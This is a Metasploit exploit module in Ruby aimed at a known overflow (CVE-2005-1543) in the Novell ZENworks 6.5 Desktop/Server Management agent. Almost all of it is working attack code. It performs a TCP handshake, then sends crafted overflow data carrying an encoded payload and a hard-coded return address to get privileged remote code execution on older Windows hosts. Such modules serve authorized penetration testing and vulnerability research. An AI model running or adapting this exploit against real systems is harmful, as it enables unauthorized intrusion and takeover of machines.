## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super( update_info( info, 'Name' => 'Novell ZENworks 6.5 Desktop/Server Management Overflow', 'Description' => %q{ This module exploits a heap overflow in the Novell ZENworks Desktop Management agent. This vulnerability was discovered by Alex Wheeler. }, 'Author' => [ 'Unknown' ], 'License' => BSD_LICENSE, 'References' => [ [ 'CVE', '2005-1543'], [ 'OSVDB', '16698'], [ 'BID', '13678'], ], 'Privileged' => true, 'Payload' => { 'Space' => 32767, 'BadChars' => "\x00", 'StackAdjustment' => -3500 }, 'Targets' => [ [ 'Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent', { 'Platform' => 'win', 'Ret' => 0x10002e06 }, ], ], 'DisclosureDate' => '2005-05-19', 'DefaultTarget' => 0, 'Notes' => { 'Reliability' => UNKNOWN_RELIABILITY, 'Stability' => UNKNOWN_STABILITY, 'SideEffects' => UNKNOWN_SIDE_EFFECTS } ) ) end def exploit connect hello = "\x00\x06\x05\x01\x10\xe6\x01\x00\x34\x5a\xf4\x77\x80\x95\xf8\x77" print_status('Sending version identification') sock.put(hello) pad = Rex::Text.rand_text_alphanumeric(6, payload_badchars) ident = sock.get_once if !(ident and ident.length == 16) print_error('Failed to receive agent version identification') return end print_status('Received agent version identification') print_status('Sending client acknowledgement') sock.put("\x00\x01") # Stack buffer overflow in ZenRem32.exe / ZENworks Server Management sock.put("\x00\x06#{pad}\x00\x06#{pad}\x7f\xff" + payload.encoded + "\x00\x01") sock.get_once sock.put("\x00\x01") sock.put("\x00\x02") print_status('Sending final payload') sock.put("\x00\x24" + ('A' * 0x20) + [ target.ret ].pack('V')) print_status('Overflow request sent, sleeping for four seconds') select(nil, nil, nil, 4) handler disconnect end end